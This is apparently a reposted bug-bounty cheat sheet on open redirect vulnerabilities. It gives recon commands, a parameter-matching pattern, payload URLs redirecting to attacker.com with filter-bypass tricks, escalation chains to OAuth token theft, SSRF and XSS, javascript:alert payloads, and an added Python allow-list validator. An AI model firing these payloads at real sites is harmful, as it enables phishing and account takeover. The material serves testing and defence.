• URL redirect hunting


    https://0x00sec.org/t/open-redirection-guide/21118

    The tools are all written in Go; I'm not very familiar with them, so I'm leaving this as a placeholder for now.

    Identifying possible vulnerable endpoints:

    • waybackurls + hakrawler + gf

      cat subdomains | waybackurls | tee -a urls
      cat subdomains | hakrawler -depth 3 -plain | tee -a urls
      gf redirect urls

      using redirect.json with gf:

    {
        "flags" : "-HanrE",
        "pattern" : "url=|rt=|cgi-bin/redirect.cgi|continue=|dest=|destination=|go=|out=|redir=|redirect_uri=|redirect_url=|return=|return_path=|returnTo=|rurl=|target=|view=|from_url=|load_url=|file_url=|page_url=|file_name=|page=|folder=|folder_url=|login_url=|img_url=|return_url=|return_to=|next=|redirect=|redirect_to=|logout=|checkout=|checkout_url=|goto=|next_page=|file=|load_file="
    }
    
    • Google dorks
      site:domain.com inurl:[PARAMETER] using a parameter list
    • Manual inspection by navigating the webapp and intercepting the requests

    Confirm and exploit:

    * https://company.com/?redirect=http://attacker.com
    * https://company.com/?redirect=http://company.com.attacker.com
    * https://company.com/?redirect=https://company.com@attacker.com
    * https://company.com/?redirect=//attacker.com
    * https://company.com/?redirect=http://attacker.com#company.com
    * https://company.com/?redirect=http://attacker.com?company.com
    * https://company.com/?redirect=http://attacker.com/company.com
    * https://company.com/?redirect=http://ⓐⓣⓣⓐⓒⓚⓔⓡ.ⓒⓞⓜ
    
    Using special characters:
    ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ 
    ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ 
    ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ 
    ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ 
    Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ 
    ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ 
    ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
    

    Special characters' source

    Escalating to other vulnerabilities:

    Open Redirect + Misconfigured OAuth App => OAuth Token Stealing
    Open Redirect + Filtered SSRF => SSRF
    Open Redirect + CRLFi => XSS
    Open Redirect + javascript URI => XSS
    

    Source

    Escalate to XSS

    • https://company.com/?redirect=javascript:alert(1)
    • https://company.com/?redirect=javascript:prompt(1)

    Escalate to XSS using CRLFi
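    Taken together with the bypass list and the javascript:/CRLF escalations above, here is an added defensive example (not from the 0x00sec guide or this post): a Python allow-list check for a redirect parameter that refuses each of those forms. ALLOWED_HOSTS, is_safe_redirect and company.com as the application's own host are assumptions made for this example.

```python
import unicodedata
from urllib.parse import urlsplit

# Hosts the application may redirect to (constructed for this example).
ALLOWED_HOSTS = {"company.com", "www.company.com"}


def is_safe_redirect(target: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Allow-list check for a redirect parameter.

    Rejects every bypass form listed above: protocol-relative //host,
    userinfo tricks host@evil, look-alike subdomains host.evil, fragment
    and query tricks, javascript: URIs, raw CR/LF (CRLFi) and enclosed
    alphanumerics such as ⓐ that browsers fold back to ASCII.
    """
    # Fold look-alike Unicode the way browsers/IDNA do before comparing;
    # NFKC maps ⓐⓣⓣⓐⓒⓚⓔⓡ.ⓒⓞⓜ to attacker.com.
    target = unicodedata.normalize("NFKC", target)
    # Raw control characters (CR, LF, TAB, ...) have no place in a redirect
    # target; check before urlsplit, which silently strips some of them.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in target):
        return False
    # Site-relative paths are fine, but "//host" and "/\host" are treated
    # by browsers as protocol-relative URLs and must be refused.
    if target.startswith("/"):
        return len(target) == 1 or target[1] not in "/\\"
    parts = urlsplit(target)
    # Only http(s): this rejects javascript:, data: and scheme-less input.
    if parts.scheme.lower() not in ("http", "https"):
        return False
    # .hostname drops userinfo and port and lower-cases the host, so
    # "company.com@attacker.com" yields attacker.com, which is compared
    # exactly: company.com.attacker.com does not match company.com.
    host = (parts.hostname or "").rstrip(".")
    return host in allowed_hosts


if __name__ == "__main__":
    # Constructed sample of the payload forms from this post.
    for candidate in ("/dashboard", "https://company.com/account",
                      "//attacker.com", "https://company.com@attacker.com",
                      "http://ⓐⓣⓣⓐⓒⓚⓔⓡ.ⓒⓞⓜ", "javascript:alert(1)"):
        verdict = "ALLOW" if is_safe_redirect(candidate) else "DENY "
        print(f"{verdict} {candidate}")
```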

  • Original post: https://www.cnblogs.com/ahacker15/p/13065571.html